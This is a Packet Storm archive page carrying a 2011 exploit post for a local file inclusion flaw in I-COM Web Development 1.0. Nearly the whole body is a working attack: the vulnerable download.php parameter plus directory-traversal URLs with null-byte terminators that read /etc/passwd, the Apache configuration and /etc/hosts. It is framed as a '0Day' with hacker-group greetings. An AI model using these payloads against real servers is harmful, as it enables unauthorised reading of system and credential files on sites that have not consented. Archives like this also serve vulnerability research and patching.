exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

I-COM 1.0 Local File Inclusion

I-COM 1.0 Local File Inclusion
Posted Feb 11, 2011
Authored by ThunDEr HeaD

I-COM Web Development version 1.0 suffers from a local file inclusion vulnerability.

tags | exploit, web, local, file inclusion
SHA-256 | 3a006ad97c3ef0050c6a7e4d34c2327b397876579036fb0ebd9d7b6ea6c47681

I-COM 1.0 Local File Inclusion

Change Mirror Download
> #########################################################################
>
> [+] Exploit Title : I-COM web Development LFI Vulnerability
> [~] Author : ThunDEr HeaD
> [~] Contact : thunderhead10@gmail.com
> [~] Date : 10-01-2011
> [~] HomePage : www.indishell.in
> [~] Verstion : 1.0
> [~] Tested on : Sites By I-com
> [~] Vulnerability Style : local file inclusion
> [~] Vulnerability Dir : Directory traversal
>
> #########################################################################
>
> ~~~~~~~~~~~~~~~~~~~~~~~~~[Greetz To]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>
> ----== INDIAN CYBER ARMY ==----
>
> We Are: -[SiLeNtp0is0n]- , stRaNgEr , inX_rOot , NEO H4cK3R , DarkL00k , Mahi
> eXeSoul , G00g!3 W@rr!0r , str1k3r, co0Lt04d , ATUL DWIVEDI ,Jackh4xor , Th3 RDX
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>
> ~~~~~~~~~~~~~~~~~~~~~~~~~~[EXPLOIT]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>
> ---==[local file inclusion]==---
>
> [#] Go to the URL:
>
> http://server/i-com/download.php?dfile=
>
> [#] Apply these code(s) :
>
> ../../../../../../../../etc/passwd
>
> http://server/i-com/download.php?dfile=../../../../../../../../etc/passwd%00
>
> http://server/i-com/download.php?dfile=../../../../../../../../etc/httpd/conf/httpd.conf%00
>
> http://server/i-com/download.php?dfile=../../../../../../../../etc/hosts%00
>
>
> Enj0y! :D
>
>
> [#] DOne now time to rock \m/
>
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>
> -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
> Bug discovered : 10 feb 2011
>
> finish(0);
> -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
>
> #End 0Day#

Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    28 Files
  • 16
    Jul 16th
    6 Files
  • 17
    Jul 17th
    34 Files
  • 18
    Jul 18th
    6 Files
  • 19
    Jul 19th
    34 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    19 Files
  • 23
    Jul 23rd
    17 Files
  • 24
    Jul 24th
    47 Files
  • 25
    Jul 25th
    31 Files
  • 26
    Jul 26th
    13 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    27 Files
  • 30
    Jul 30th
    49 Files
  • 31
    Jul 31st
    29 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close